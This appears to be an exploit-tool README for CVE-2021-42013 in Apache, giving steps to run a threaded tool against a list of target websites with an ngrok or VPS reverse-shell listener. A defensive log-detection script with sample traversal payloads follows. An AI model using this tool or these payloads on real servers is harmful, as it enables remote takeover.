
CVE-2021-42013 is a critical vulnerability in Apache HTTP Server 2.4.49 & 2.4.50 that allows remote code execution (RCE) via a path traversal attack.
# 🔍 What’s the Issue?
It exploits a misconfiguration in mod_proxy.
Attackers can access restricted files or execute arbitrary commands on the server.
It affects Apache 2.4.49 & 2.4.50 (but is fixed in 2.4.51).
This vulnerability is a path traversal: attackers manipulate URLs so that they map to files outside the intended directories configured by Alias-like directives. When those files lack proper protection, such as the "Require all denied" configuration, attackers can exploit the vulnerability by executing commands from the vulnerable path.
# Exploitation and Impact 💥
The severity of this vulnerability escalates if CGI scripts are enabled for the aliased paths. Exploiting CVE-2021-42013 grants attackers the ability to remotely execute arbitrary code on the targeted server, potentially leading to a complete system compromise as seen below.
1. You must have python3 installed. Install the dependencies with: python3 -m pip install rich alive-progress
2. Set up your local host with ngrok tcp 1337 (premium members only, because nothing good is free; they are expired test as my forms now lol), or use your own VPS to port forward 1337
3. Run the tool with: python3 CVE-2021-42013.py --file target_website.txt --lhost ngrok_host --lport 1337 --threads 10
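
On the defensive side, the traversal requests described above can be found in Apache access logs by decoding each request path until it stops changing and checking whether its dot segments climb above the URL root. The following is an added example, not part of this repository's tool; the /cgi-bin/ prefix, the log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line and status code from an Apache common/combined log entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def fully_decode(path, max_rounds=5):
    """Percent-decode repeatedly so nested encodings of '.' are exposed."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def escapes_root(path):
    """True if the dot segments in `path` climb above the URL root."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def classify(line, cgi_prefix="/cgi-bin/"):  # cgi_prefix: assumed ScriptAlias
    """Return a finding dict for a traversal request, or None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    raw = m["target"].split("?", 1)[0]
    decoded = fully_decode(raw)
    if not escapes_root(decoded):
        return None
    return {
        "method": m["method"],
        "path": decoded,
        "encoded": not escapes_root(raw),   # traversal only visible after decoding
        "cgi": raw.startswith(cgi_prefix),  # aliased CGI path: code execution risk
        "served": m["status"] == "200",     # server answered instead of refusing
    }

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE = [
    '203.0.113.5 - - [10/Oct/2021:13:55:36 +0000] "GET /icons/../index.html HTTP/1.1" 200 45',
    '203.0.113.5 - - [10/Oct/2021:13:55:37 +0000] "GET /icons/%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 403 199',
    '203.0.113.5 - - [10/Oct/2021:13:55:38 +0000] "POST /cgi-bin/%252e%252e/%252e%252e/opt/tool HTTP/1.1" 200 12',
]
```

A finding with both "cgi" and "served" set on a host running 2.4.49 or 2.4.50 is the case to triage first, since the page ties code execution to CGI being enabled on the aliased path.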